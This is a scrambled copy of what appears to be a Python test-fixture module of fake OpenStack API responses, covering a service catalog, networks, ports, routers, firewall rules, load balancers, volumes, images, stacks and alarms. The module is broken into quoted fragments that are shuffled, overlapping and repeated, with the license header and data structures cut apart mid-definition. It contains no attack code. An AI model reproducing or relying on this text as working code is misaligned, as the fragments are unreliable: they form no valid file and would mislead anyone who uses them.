"] STORAGE_OBJECTS_LIST_0 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[0]['name'],",
"'expires': '2012-10-03T16:53:36Z', 'id': TOKEN_ID, 'tenant': { 'description': '', 'enabled': True, 'id': PROJECT_ID, 'name':",
"None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID } ],",
"\"status\": \"ACTIVE\", \"tenant_id\": \"openstack\", \"updated\": \"2012-09-07T16:56:37Z\", \"user_id\": \"fake\" } ] } IMAGES_LIST =",
"\"mac_address\": \"fa:16:3e:2d:dc:7e\", \"fixed_ips\": [ { \"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\": \"10.0.0.1\" } ], \"id\": PORTS_IDS[0],",
"}, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"\", \"extra_dhcp_opts\": [], \"fixed_ips\": [",
"None, \"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[0], \"name\": \"\",",
"\"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.125\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[0], \"id\":",
"\"description\": \"First test\", \"links\": [ { \"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\": \"self\" } ], \"stack_status_reason\":",
"\"fixed_ip_address\": \"10.0.0.3\", \"floating_ip_address\": \"172.24.4.228\", \"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\": FLOATING_IPS_IDS[0] }, { \"router_id\": None, \"tenant_id\":",
"'publicURL': METERING_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Metering service', 'type': 'metering' }, {",
"\"firewall_rules\": [FIREWALL_RULE_IDS[1]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[1], \"description\": \"Testing firewall",
"express or implied. See the # License for the specific language governing permissions",
"ROUTER_CLEAR_GATEWAY = { \"router\": { \"status\": \"ACTIVE\", \"external_gateway_info\": None, \"name\": \"second_routers\", \"admin_state_up\": True,",
"\"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\":",
"u'name': u'_member_'}, {u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}] } STORAGE_CONTAINERS_LIST = [ { \"count\": 0,",
"\"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound",
"\"firewall_policies\": [ { \"name\": \"TestFireWallPolicy1\", \"firewall_rules\": [FIREWALL_RULE_IDS[0]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False,",
"False, \"state\": \"ok\", \"state_timestamp\": \"2013-11-21T12:33:08.486228\", \"threshold_rule\": None, \"timestamp\": \"2013-11-21T12:33:08.486221\", \"type\": \"threshold\", \"user_id\": \"c96c887c216949acbdfbd8b494863567\"",
"\"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"router1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[1] },",
"u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ] } ROUTERS_LIST = { \"routers\": [{ \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"},",
"\"member test1\", \"pool_id\": LBAAS_POOL_IDS[1] } ] } FIREWALL_LIST = { \"firewalls\": [ {",
"= { \"metering_labels\": [ { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test1\", \"name\": \"Meterlabel1\",",
"'endpoints_links': [], 'name': 'Compute Service', 'type': 'compute' }, { 'endpoints': [{ 'adminURL': 'http://admin:8773/services/Admin',",
"\"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": UNBOUND_PORT_ID, \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound",
"\"id\": FIREWALL_IDS[1], \"description\": \"\" } ] } METERING_LABEL_LIST = { \"metering_labels\": [ {",
"FIREWALL_POLICY_IDS[0], \"description\": \"Testing firewall policy 1\" }, { \"name\": \"TestFireWallPolicy2\", \"firewall_rules\": [FIREWALL_RULE_IDS[1]], \"tenant_id\":",
"} } ROLE_LIST = {u'roles': [ {u'id': u'201c290919ec4d6bb350401f8b4145a3', u'name': u'heat_stack_owner'}, {u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name':",
"\"metadata\": { \"My Server Name\": \"Apache1\" }, \"name\": \"new-server-test\", \"progress\": 0, \"status\": \"ACTIVE\",",
"-*- # # Copyright © 2014 Cloudwatt # # Licensed under the Apache",
"\"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[1], \"id\": FIREWALL_IDS[1], \"description\": \"\" } ] }",
"\"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }] } ROUTER_CLEAR_GATEWAY = { \"router\": { \"status\": \"ACTIVE\", \"external_gateway_info\": None,",
"\"name\": \"custom\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None,",
"\"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\": \"network_3\", \"admin_state_up\": True, \"tenant_id\":",
"\"description\": \"\", \"address\": \"10.0.0.125\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[0], \"id\": LBAAS_VIP_IDS[0], \"status_description\": \"\", \"name\":",
"\"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": PROJECT_ID }, { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\":",
"'network' }, { 'endpoints': [{ 'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL': METERING_INTERNAL_ENDPOINT, 'publicURL': METERING_PUBLIC_ENDPOINT, 'region': 'RegionOne'}],",
"{ \"private\": [ { \"addr\": \"192.168.0.3\", \"version\": 4 } ] }, \"created\": \"2012-09-07T16:56:37Z\",",
"{u'id': u'201c290919ec4d6bb350401f8b4145a3', u'name': u'heat_stack_owner'}, {u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'}, {u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'}, {u'id':",
"IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or",
"\"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"router1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[1] }, {",
"{ \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\": None, \"source_ip_address\": None, \"destination_ip_address\": None,",
"# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in",
"{ 'serviceCatalog': [{ 'endpoints': [{ 'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL': VOLUME_INTERNAL_ENDPOINT, 'publicURL': VOLUME_PUBLIC_ENDPOINT, 'region': 'RegionOne'}],",
"PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:b9:ef:05\", \"fixed_ips\":",
"\"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[1], \"id\": LBAAS_VIP_IDS[1], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\":",
"\"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": PROJECT_ID }, { \"admin_state_up\":",
"\"device_id\": \"\", \"device_owner\": \"\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\"",
"\"1\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/flavors/1\", \"rel\": \"bookmark\" } ] }, \"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\",",
"ROUTERS_LIST = { \"routers\": [{ \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"second_routers\", \"admin_state_up\":",
"None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID } ],",
"\"stacks\": [ { \"description\": \"First test\", \"links\": [ { \"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\": \"self\"",
"either express or implied. See the # License for the specific language governing",
"10, u'status': u'available', u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ] } ROUTERS_LIST = { \"routers\": [{ \"status\":",
"NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE",
"[\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS = [\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS = [\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS = [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\",",
"\"name\": \"nova\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[1], \"shared\": False }, { \"status\":",
"}, { 'endpoints': [{ 'adminURL': 'http://admin:9292/v1', 'internalURL': IMAGE_INTERNAL_ENDPOINT, 'publicURL': IMAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links':",
"\"CirrOS v0.3.0\", \"id\": VOLUMES_IDS[1], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\":",
"\"id\": SNAPSHOTS_IDS[0], \"display_name\": \"snap-001\", \"display_description\": \"Daily backup\", \"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\": \"available\", \"size\": 10,",
"\"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID } ]",
"\"ami\", \"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec\", \"owner\": PROJECT_ID,",
"\"\", \"stack_name\": \"stack2\", \"creation_time\": \"2015-03-03T17:34:21Z\", \"updated_time\": None, \"stack_status\": \"DELETE_FAILED\", \"id\": \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\" } ]",
"None, \"status\": \"available\", \"volume_type\": \"None\" } ] } SNAPSHOTS_LIST = { \"snapshots\": [",
"\"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"compute:azerty\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ {",
"[], 'name': 'Image Service', 'type': 'image' }, { 'endpoints': [{ 'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL':",
"\"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\",",
"80, \"port_id\": PRIVATE_PORT_IDS[0], \"id\": LBAAS_VIP_IDS[0], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID,",
"\"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\",",
"PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 3714968, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:53\" } ]",
"\"floating_ip_address\": \"172.24.4.227\", \"port_id\": None, \"id\": FLOATING_IPS_IDS[1] } ] } LBAAS_HEALTHMONITOR_LIST = { \"health_monitors\":",
"}, { 'endpoints': [{ 'adminURL': 'http://admin:8080', 'internalURL': STORAGE_INTERNAL_ENDPOINT, 'publicURL': STORAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links':",
"\"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\":",
"COMPUTE_INTERNAL_ENDPOINT, 'publicURL': COMPUTE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Compute Service', 'type': 'compute' },",
"False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[1], \"description\": \"Testing firewall policy 2\" } ] }",
"'endpoints_links': [], 'name': 'Object Storage Service', 'type': 'object-store' }, { 'endpoints': [{ 'adminURL':",
"} ] } ROUTER1_PORTS = { \"ports\": [ { \"status\": \"DOWN\", \"name\": \"\",",
"u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}] } STORAGE_CONTAINERS_LIST = [ { \"count\": 0, \"bytes\": 0, \"name\":",
"'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Orchestration service', 'type': 'orchestration'",
"{ \"status\": \"ACTIVE\", \"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\": \"private\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[0],",
"on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND,",
"specific language governing permissions and limitations # under the License. TOKEN_ID = '<KEY>'",
"{ \"pools\": [ { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\":",
"\"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\":",
"[{ 'adminURL': 'http://admin:8080', 'internalURL': STORAGE_INTERNAL_ENDPOINT, 'publicURL': STORAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Object",
"None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\",",
"} STORAGE_CONTAINERS_LIST = [ { \"count\": 0, \"bytes\": 0, \"name\": STORAGE_CONTAINERS[0] }, {",
"\"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.226\" } ], \"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\": ROUTERS_IDS[1]",
"u'service'}, {u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'}, {u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'}, {u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'},",
"PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58' AUTH_URL = \"http://localhost:5000/v2.0\" ROLE_URL = \"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT",
"\"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" } ] } SNAPSHOTS_LIST = { \"snapshots\":",
"\"protected\": False, \"size\": 3714968, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:53\" } ] } ALARMS_LIST =",
"\"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[0] },",
"'Object Storage Service', 'type': 'object-store' }, { 'endpoints': [{ 'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL': NETWORK_INTERNAL_ENDPOINT,",
"OR CONDITIONS OF ANY KIND, either express or implied. See the # License",
"\"2014-02-03T14:13:53\" } ] } ALARMS_LIST = [ { \"alarm_actions\": [ \"http://site:8000/alarm\" ], \"alarm_id\":",
"obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #",
"= \"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT = 'http://public:9292' STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT =",
"\"delay\": 5, \"expected_codes\": \"200\", \"max_retries\": 5, \"http_method\": \"GET\", \"timeout\": 2, \"pools\": [], \"url_path\":",
"STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT",
"[], \"availability_zone\": \"nova\", \"bootable\": \"false\", \"created_at\": \"2014-02-03T14:22:52.000000\", \"display_description\": None, \"display_name\": \"toto\", \"id\": VOLUMES_IDS[0],",
"u'ResellerAdmin'}, {u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'}, {u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'}, {u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'},",
"] }, \"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\": SERVERS_IDS[0], \"image\": { \"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\": [ {",
"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may #",
"\"status_description\": None, \"id\": LBAAS_POOL_IDS[1] } ] } LBAAS_MEMBER_LIST = { \"members\": [ {",
"\"pool_id\": LBAAS_POOL_IDS[1] } ] } FIREWALL_LIST = { \"firewalls\": [ { \"status\": \"ACTIVE\",",
"\"expected_codes\": \"200\", \"max_retries\": 5, \"http_method\": \"GET\", \"timeout\": 2, \"pools\": [], \"url_path\": \"/\", \"type\":",
"= [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS = [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS = [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS = [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"]",
"} ] } IMAGES_LIST = { \"images\": [ { \"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\": \"ami\",",
"\"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS = [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS = [\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS = [\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"]",
"\"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ami\", \"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\": True, \"min_disk\": 0, \"min_ram\":",
"[\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID = \"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS = [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS = [\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"]",
"[], 'name': 'Object Storage Service', 'type': 'object-store' }, { 'endpoints': [{ 'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696',",
"] } SNAPSHOTS_LIST = { \"snapshots\": [ { \"id\": SNAPSHOTS_IDS[0], \"display_name\": \"snap-001\", \"display_description\":",
"0, \"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 3714968, \"status\": \"active\",",
"\"created_at\": \"2012-03-19T01:52:47Z\" } ] } VOLUME_BACKUPS_LIST = { u'backups': [ {u'availability_zone': u'nova', u'container':",
"= [\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS = [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS = [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS = [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\",",
"\"aki\", \"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-kernel\", \"owner\": PROJECT_ID,",
"= { \"networks\": [ { \"status\": \"ACTIVE\", \"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\": \"private\", \"admin_state_up\": True,",
"\"status\": \"DOWN\", \"tenant_id\": \"ANOTHER_PROJECT\" } ]} REMOVE_ROUTER_INTERFACE = { \"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\",",
"{ \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"delay\": 5, \"expected_codes\": \"200\", \"max_retries\": 5, \"http_method\": \"GET\",",
"STACKS_IDS = [\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID = \"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS = [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS =",
"'%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT, u'rel': u'self'}], u'name': u'volumebackup-01', u'object_count': 22, u'size': 10, u'status': u'available',",
"\"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\":",
"'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL': METERING_INTERNAL_ENDPOINT, 'publicURL': METERING_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Metering service',",
"Server Name\": \"Apache1\" }, \"name\": \"new-server-test\", \"progress\": 0, \"status\": \"ACTIVE\", \"tenant_id\": \"openstack\", \"updated\":",
"\"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS = [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS = [\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID = \"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS =",
"\"source_ip_address\": None, \"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[1], \"name\":",
"\"admin_state_up\": True, \"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\", \"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\": True } ] } SECGROUPS_LIST =",
"\"member test1\", \"pool_id\": LBAAS_POOL_IDS[0] }, { \"id\": LBAAS_MEMBER_IDS[1], \"address\": \"10.0.0.123\", \"protocol_port\": 80, \"tenant_id\":",
"\"status\": \"DOWN\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\":",
"}] } ROUTER_CLEAR_GATEWAY = { \"router\": { \"status\": \"ACTIVE\", \"external_gateway_info\": None, \"name\": \"second_routers\",",
"may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #",
"\"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 3714968, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:53\"",
"'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Metering service', 'type': 'metering' }, { 'endpoints': [{",
"22, u'size': 10, u'status': u'available', u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ] } ROUTERS_LIST = { \"routers\":",
"\"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\": FLOATING_IPS_IDS[0] }, { \"router_id\": None, \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": None,",
"test2\", \"name\": \"Meterlabel2\", \"id\": METERING_LABEL_IDS[1] } ] } FIREWALL_POLICY_LIST = { \"firewall_policies\": [",
"\"tenant_id\": PROJECT_ID, \"description\": \"Meter label test1\", \"name\": \"Meterlabel1\", \"id\": METERING_LABEL_IDS[0] }, { \"tenant_id\":",
"\"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[1] } ]",
"[ { \"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack2\", \"creation_time\":",
"\"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS = [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS = [\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID = \"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS",
"VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT = 'http://public:9292' STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT",
